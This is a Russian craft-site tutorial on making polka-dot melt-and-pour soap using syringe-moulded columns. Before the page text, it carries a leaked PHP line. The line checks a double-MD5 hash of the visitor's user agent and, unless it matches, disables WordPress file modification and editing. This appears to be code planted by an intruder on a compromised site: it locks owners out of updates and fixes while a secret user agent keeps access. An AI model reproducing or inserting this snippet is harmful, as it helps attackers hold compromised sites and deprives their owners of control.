if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мастер-класс как сделать стильное мыло “в горох” | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мастер-класс как сделать стильное мыло “в горох”

Ткань в горошек, начиная с последних годов XVIII, не сходит с модных подиумов мира. А в ХХ веке, благодаря Ив Сен-Лорану, этот рисунок стал атрибутом модного веяния. Сегодня мы расскажем как сделать такое же стильное мыло в горох

Ткань в горо­шек, начи­ная с послед­них годов XVIII, не схо­дит с мод­ных поди­у­мов мира. А в ХХ веке, бла­го­да­ря Ив Сен-Лора­ну, этот рису­нок стал атри­бу­том мод­но­го вея­ния. Сего­дня мы рас­ска­жем как сде­лать такое же стиль­ное мыло в горох.

Нам необ­хо­ди­мо:

  • 500–600гр. осно­вы для мыла
  • Кос­ме­ти­че­ские неми­гри­ру­ю­щие пиг­мен­ты (жел­тый, оран­же­вый и вишневый)
  • Фор­ма под нарез­ку (мож­но квадрат)
  • Аро­ма­ти­за­тор или  эфир­ное масло
  • Меди­цин­ский спирт, нож, чаша для плав­ле­ния основы,

У шпри­ца обрежь­те кон­чик, что­бы вышла тру­боч­ка. Пор­шень выдвинь­те на пол­ную и поставь­те шприц вер­ти­каль­но. Рас­плавь­те 100гр. белой осно­вы, аро­ма­ти­зи­руй­те и покрась­те в жел­тый цвет. Залей­те поло­ви­ну этой осно­вы в поло­ви­ну шпри­цов, а в оста­ток добавь­те оран­же­вый кра­си­тель и залей­те в осталь­ные шприцы.

mas_bolshoe010_2 mas_bolshoe010_1

Подо­жди­те, что­бы они засты­ли, и вытолк­ни­те порш­ня­ми полу­чен­ные мыль­ные стол­би­ки. Пока они осты­ва­ют, рас­плавь­те всю про­зрач­ную осно­ву и покрась­те в виш­не­вый цвет. Поставь­те их вер­ти­каль­но в фор­му для мыла и хоро­шо обрыз­гай­те спиртом.

mas_bolshoe010_3

Далее сле­ду­ет залить стол­бы виш­не­вой осно­вой и сбрыз­нуть спир­том что­бы убрать пузы­ри и ждать пока осты­нет. Затем, извле­ки­те из фор­мы и срежь­те лиш­ние концы.

mas_bolshoe010_4


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: AmouR

Обожаю квиллинг, рукоделие и рисование. Ну и конечно мыловарение! Читайте все мои записи!